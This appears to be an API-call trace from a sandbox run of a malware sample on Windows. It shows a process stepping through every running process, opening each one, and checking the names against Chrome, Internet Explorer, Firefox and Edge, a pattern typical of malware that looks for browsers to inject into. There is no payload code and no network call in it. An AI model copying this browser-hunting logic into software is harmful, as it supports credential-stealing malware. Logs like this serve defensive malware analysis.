	[0244.860] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.861] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.861] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.862] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.862] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x90a8
	[0244.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.862] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.863] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.863] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.863] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.864] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.864] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x90ac
	[0244.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.864] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.865] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.865] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.865] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.866] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.866] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x90b0
	[0244.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.867] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.867] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.867] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.867] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.868] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.868] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x90b4
	[0244.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.869] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.869] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.869] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.869] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.870] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0244.870] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x90b8
	[0244.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.871] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0244.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.871] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.871] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0244.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.871] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.872] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.872] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x90bc
	[0244.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.872] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.873] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.873] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.873] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.875] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0244.875] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x90c0
	[0244.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.876] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.876] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.876] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.876] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.877] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0244.877] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x90c4
	[0244.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.878] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0244.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.878] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.878] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0244.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.878] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.879] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.879] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x90c8
	[0244.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.880] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.880] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.880] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.880] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.881] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0244.881] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x90cc
	[0244.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.882] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0244.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.882] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.882] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0244.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.883] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.883] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0244.884] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x90d0
	[0244.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.884] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0244.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.884] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.884] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0244.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.885] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.885] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0244.885] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x90d4
	[0244.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.886] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0244.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.886] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.886] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0244.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.886] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.887] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0244.887] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x90d8
	[0244.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.887] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0244.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.888] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.888] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0244.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.888] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.889] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0244.890] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0244.890] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0244.891] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x90dc
	[0244.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.891] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0244.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.891] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.892] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.892] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0244.892] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.892] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.893] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0244.894] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x90e0
	[0244.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.894] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0244.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.894] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.894] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0244.895] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.895] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.895] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0244.896] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x90e4
	[0244.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.896] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0244.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.896] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.896] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0244.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.897] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.897] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0244.898] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x90e8
	[0244.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.898] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0244.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.898] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.898] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0244.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.899] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.899] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0244.900] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x90ec
	[0244.900] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.900] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0244.900] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.900] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.901] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0244.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.901] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.902] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0244.903] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x90f0
	[0244.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.903] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0244.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.903] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.903] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0244.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.903] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.904] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0244.905] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x90f4
	[0244.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.905] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0244.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.905] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.909] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0244.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.909] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.909] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0244.910] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x90f8
	[0244.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.910] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0244.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.911] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.911] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0244.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.912] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.912] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0244.913] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x90fc
	[0244.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.913] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0244.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.913] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.914] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0244.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.914] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.914] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0244.915] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x9100
	[0244.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.915] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0244.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.915] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.915] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0244.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.916] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.916] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0244.917] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x9104
	[0244.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.917] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0244.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.917] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.918] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0244.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.918] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
